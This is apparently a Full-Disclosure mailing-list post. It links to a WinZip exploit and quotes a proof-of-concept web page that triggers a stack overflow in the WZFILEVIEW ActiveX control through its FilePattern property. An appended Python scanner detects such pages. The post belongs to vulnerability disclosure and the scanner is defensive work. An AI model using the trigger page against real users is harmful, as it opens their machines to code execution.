here we go, enjoy! https://prdelka.blackart.org.uk/exploitz/prdelka-vs-MS-winzip.c
--- Micheal Turner <[EMAIL PROTECTED]> wrote:

> 7245 correctly resolves this issue; standard stack
> overflow in WZFILEVIEW.FilePattern snatching EIP;
> PoC below;
>
> <HTML>
> <HEAD>
> <TITLE></TITLE>
> </HEAD>
> <BODY>
> <SCRIPT LANGUAGE="VBScript">
> <!--
> Sub WZFILEVIEW_OnAfterItemAdd(Item)
> WZFILEVIEW.FilePattern = "SMASHTHESTACKHERE"
> end sub
> -->
> </SCRIPT>
> <OBJECT ID="WZFILEVIEW" WIDTH=200 HEIGHT=200
> CLASSID="CLSID:A09AE68F-B14D-43ED-B713-BA413F034904">
> </OBJECT>
> </BODY>
> </HTML>
>
> -- prdelka

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
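For triage of saved pages or proxy captures, a scanner that flags HTML instantiating the control named in the quoted PoC and any script that assigns to its FilePattern property. This is an added example, not part of the original messages; the function and field names are hypothetical, while the CLSID and property name are taken from the quoted PoC.

```python
import re
from html.parser import HTMLParser

# CLSID and property name come from the PoC quoted in the message above.
CLSID = "A09AE68F-B14D-43ED-B713-BA413F034904"
PROPERTY = "FilePattern"

class _Collector(HTMLParser):
    """Records ids of OBJECT tags bound to CLSID and the raw text of SCRIPT blocks."""
    def __init__(self):
        super().__init__()
        self.object_ids, self.scripts, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        a = {k: v or "" for k, v in attrs}  # tag and attribute names arrive lowercased
        if tag == "object" and CLSID.lower() in a.get("classid", "").lower():
            self.object_ids.append(a.get("id", ""))
        elif tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:  # script bodies arrive as raw text, "<!--" included
            self.scripts[-1] += data

def scan(html_text):
    """Return one finding per OBJECT tag that instantiates the control."""
    c = _Collector()
    c.feed(html_text)
    c.close()
    findings = []
    for oid in c.object_ids:
        # Matches `<id>.FilePattern = "literal"` (VBScript or JScript), not `==`.
        pat = re.compile(r"\b%s\s*\.\s*%s\s*=(?!=)\s*(?:\"([^\"]*)\"|'([^']*)')?"
                         % (re.escape(oid), PROPERTY), re.I)
        hits = [m for s in c.scripts for m in pat.finditer(s)] if oid else []
        lens = [len(m.group(1) or m.group(2) or "") for m in hits]
        findings.append({"object_id": oid, "sets_property": bool(hits),
                         "max_literal_len": max(lens, default=0)})
    return findings

# Sample inputs: the first reuses the markup from the message, the second is constructed.
SAMPLE_POC = ('<SCRIPT LANGUAGE="VBScript">\n<!--\nSub WZFILEVIEW_OnAfterItemAdd(Item)\n'
              'WZFILEVIEW.FilePattern = "SMASHTHESTACKHERE"\nend sub\n-->\n</SCRIPT>\n'
              '<OBJECT ID="WZFILEVIEW" WIDTH=200 HEIGHT=200\n'
              'CLASSID="CLSID:A09AE68F-B14D-43ED-B713-BA413F034904">\n</OBJECT>')
SAMPLE_OTHER = '<object id="x" classid="clsid:00000000-0000-0000-0000-000000000000"></object>'
```

A finding with `sets_property` false still means the page loads the control; `max_literal_len` is 0 when the assigned value is built by an expression rather than written as a string literal.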
